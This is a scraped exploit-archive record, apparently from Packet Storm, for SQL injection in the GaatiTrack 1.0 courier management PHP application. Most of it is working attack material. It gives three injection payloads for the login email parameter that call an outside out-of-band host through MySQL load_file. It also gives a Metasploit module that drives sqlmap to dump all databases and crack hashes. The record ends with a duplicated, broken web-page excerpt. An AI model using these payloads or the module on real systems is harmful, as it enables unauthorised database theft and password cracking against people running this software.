{“lastseen”:”2025-10-06T16:15:56″,”description”:”GaatiTrack………………………………………”,”published”:”2025-10-06T00:00:00″,”modified”:”2025-10-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GaatiTrack 1.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210194″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: GaatiTrack-1.0 Copyright\u00a92025-Multiple-SQLi – Metasploit module\\n # Author: nu11secur1ty\\n # Date: 10\/06\/2025\\n # Vendor: https:\/\/www.mayurik.com\/\\n # Software:\\n https:\/\/www.sourcecodester.com\/php\/16848\/best-courier-management-system-project-php.html\\n # Reference: https:\/\/portswigger.net\/web-security\/sql-injection\\n \\n ## Description:\\n The `email` parameter appears to be vulnerable to SQL injection attacks.\\n The payload ‘+(select load_file(‘\\\\\\\\\\\\\\\\\\n geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\\\\\\\okf’))+’ was\\n submitted in the email parameter. This payload injects a SQL sub-query that\\n calls MySQL’s load_file function with a UNC file path that references a URL\\n on an external domain. The application interacted with that domain,\\n indicating that the injected SQL query was executed.\\n \\n STATUS: HIGH-CRITICAL Vulnerability\\n \\n \\n [+]Payload:\\n – SQLi:\\n \\n “`SQLi\\n —\\n Parameter: email (POST)\\n Type: boolean-based blind\\n Title: AND boolean-based blind – WHERE or HAVING clause (subquery -\\n comment)\\n Payload: email=cnbkCuPP@burpcollaborator.net’+(select load_file(‘\\\\\\\\\\\\\\\\\\n geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\\\\\\\okf’))+” AND\\n 3077=(SELECT (CASE WHEN (3077=3077) THEN 3077 ELSE (SELECT 5162 UNION\\n SELECT 5005) END))– -\\u0026password=r5I!g0t!W9\\n \\n Type: error-based\\n Title: MySQL \\u003e= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP\\n BY clause (FLOOR)\\n Payload: email=cnbkCuPP@burpcollaborator.net’+(select load_file(‘\\\\\\\\\\\\\\\\\\n geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\\\\\\\okf’))+” AND (SELECT\\n 5507 FROM(SELECT COUNT(*),CONCAT(‘qkqqq’,(SELECT\\n (ELT(5507=5507,1))),’qxxpq’,FLOOR(RAND(0)*2))x FROM\\n INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– YcNj\\u0026password=r5I!g0t!W9\\n \\n Type: time-based blind\\n Title: MySQL \\u003e= 5.0.12 AND time-based blind (query SLEEP)\\n Payload: email=cnbkCuPP@burpcollaborator.net’+(select load_file(‘\\\\\\\\\\\\\\\\\\n geyz33s0w543jnmhknwp9j5oefk9822qtthl4bs0.oastify.com\\\\\\\\okf’))+” AND (SELECT\\n 2855 FROM (SELECT(SLEEP(11)))jpbI)– jtuB\\u0026password=r5I!g0t!W9\\n —\\n “`\\n \\n [+]MSF exploit:\\n \\n “`rb\\n ##\\n # gaati.rb\\n #\\n # Author: nu11secur1ty\\n # Description: gaati-sqli\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n \\n def initialize(info = {})\\n super(\\n ‘Name’ =\\u003e ‘gaati’,\\n ‘Description’ =\\u003e ‘gaati-sqli’,\\n ‘Author’ =\\u003e [‘nu11secur1ty’],\\n ‘License’ =\\u003e MSF_LICENSE\\n )\\n \\n register_options(\\n [\\n OptString.new(‘RAW_REQUEST’, [ true, ‘Raw HTTP request (from\\n Burp)’, ” ]),\\n OptString.new(‘SQLMAP_PATH’, [ false, ‘Full path to sqlmap.py’,\\n ‘\/home\/kali\/sqlmap-nu11secur1ty\/sqlmap.py’ ])\\n ]\\n )\\n end\\n \\n def run\\n raw_request = datastore[‘RAW_REQUEST’]\\n sqlmap_path = datastore[‘SQLMAP_PATH’] ||\\n ‘\/home\/kali\/sqlmap-nu11secur1ty\/sqlmap.py’\\n \\n if raw_request.nil? || raw_request.empty?\\n print_error(\\”RAW_REQUEST is empty \u2014 will attempt to use system\\n exploit.txt if present.\\”)\\n end\\n \\n # Prefer system exploit.txt in MSF module dir (no need to cat)\\n system_exploit =\\n ‘\/usr\/share\/metasploit-framework\/modules\/auxiliary\/MSF\/exploit.txt’\\n use_file = nil\\n \\n if File.exist?(system_exploit)\\n use_file = system_exploit\\n print_good(\\”Using existing exploit file: #{use_file}\\”)\\n else\\n # fallback: write to user-writable home dir\\n exploit_dir = File.join(Dir.home, \\”.msf_exploits\\”)\\n Dir.mkdir(exploit_dir) unless Dir.exist?(exploit_dir)\\n timestamp = Time.now.strftime(\\”%Y%m%d%H%M%S\\”)\\n tmp_file = File.join(exploit_dir, \\”exploit_#{timestamp}.txt\\”)\\n \\n if raw_request.nil? || raw_request.empty?\\n print_error(\\”No RAW_REQUEST provided and no system exploit.txt\\n found \u2014 nothing to do.\\”)\\n return\\n end\\n \\n begin\\n File.open(tmp_file, \\”w\\”) { |f| f.write(raw_request) }\\n print_good(\\”Saved RAW_REQUEST -\\u003e #{tmp_file}\\”)\\n use_file = tmp_file\\n rescue Errno::EACCES =\\u003e e\\n print_error(\\”Cannot write temp exploit file: #{e}\\”)\\n return\\n rescue =\\u003e e\\n print_error(\\”Failed to save temp request: #{e}\\”)\\n return\\n end\\n end\\n \\n unless File.exist?(sqlmap_path)\\n print_error(\\”sqlmap.py not found at #{sqlmap_path}. Set SQLMAP_PATH\\n option to correct path.\\”)\\n # do not delete the temp file so user can inspect\\n return\\n end\\n \\n sqlmap_cmd = [\\n \\”python3\\”,\\n sqlmap_path,\\n \\”-r\\”, use_file,\\n \\”–no-cast\\”,\\n \\”–no-escape\\”,\\n \\”–dbms=mysql\\”,\\n \\”–time-sec=11\\”,\\n \\”–random-agent\\”,\\n \\”–level=5\\”,\\n \\”–risk=3\\”,\\n \\”–batch\\”,\\n \\”–flush-session\\”,\\n \\”–technique=TBEUSQ\\”,\\n \\”–union-char=UCHAR\\”,\\n ‘–answers=\\”crack=Y,dict=Y,continue=Y,quit=N\\”‘,\\n \\”–dump-all\\”\\n ].join(\\” \\”)\\n \\n print_status(\\”Executing sqlmap: #{sqlmap_cmd}\\”)\\n begin\\n system(sqlmap_cmd)\\n print_good(\\”sqlmap finished (check output above)\\”)\\n rescue =\\u003e e\\n print_error(\\”Failed to execute sqlmap: #{e}\\”)\\n ensure\\n # delete tmp file if we created it\\n if use_file != system_exploit\\n begin\\n File.delete(use_file) if File.exist?(use_file)\\n print_status(\\”Deleted temporary file #{use_file}\\”)\\n rescue =\\u003e e\\n print_warning(\\”Could not delete temporary file: #{e}\\”)\\n end\\n end\\n end\\n end\\n end\\n \\n “`\\n \\n # Reproduce:\\n [href](https:\/\/www.patreon.com\/posts\/gaatitrack-1-0-140566642)\\n \\n # Buy an exploit only:\\n [href](https:\/\/www.patreon.com\/posts\/gaatitrack-1-0-140566642)\\n \\n # Time spent:\\n 01:15:00\\n \\n \\n — \\n System Administrator – Infrastructure Engineer\\n Penetration Testing Engineer\\n Exploit developer at https:\/\/packetstormsecurity.com\/\\n https:\/\/cve.mitre.org\/index.html\\n https:\/\/cxsecurity.com\/ and https:\/\/www.exploit-db.com\/\\n home page: https:\/\/www.asc3t1c-nu11secur1ty.com\/\\n hiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=\\n nu11secur1ty \\u003chttp:\/\/nu11secur1ty.com\/\\u003e”,”sourceHref”:”https:\/\/packetstorm.news\/download\/210194″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/210194\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-06T16:15:56″,”description”:”GaatiTrack………………………………………”,”published”:”2025-10-06T00:00:00″,”modified”:”2025-10-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GaatiTrack 1.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210194″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Titles: GaatiTrack-1.0 Copyright\u00a92025-Multiple-SQLi – Metasploit module\\n # Author: nu11secur1ty\\n # Date: 10\/06\/2025\\n # Vendor: https:\/\/www.mayurik.com\/\\n # Software:\\n https:\/\/www.sourcecodester.com\/php\/16848\/best-courier-management-system-project-php.html\\n # Reference:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-20371","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n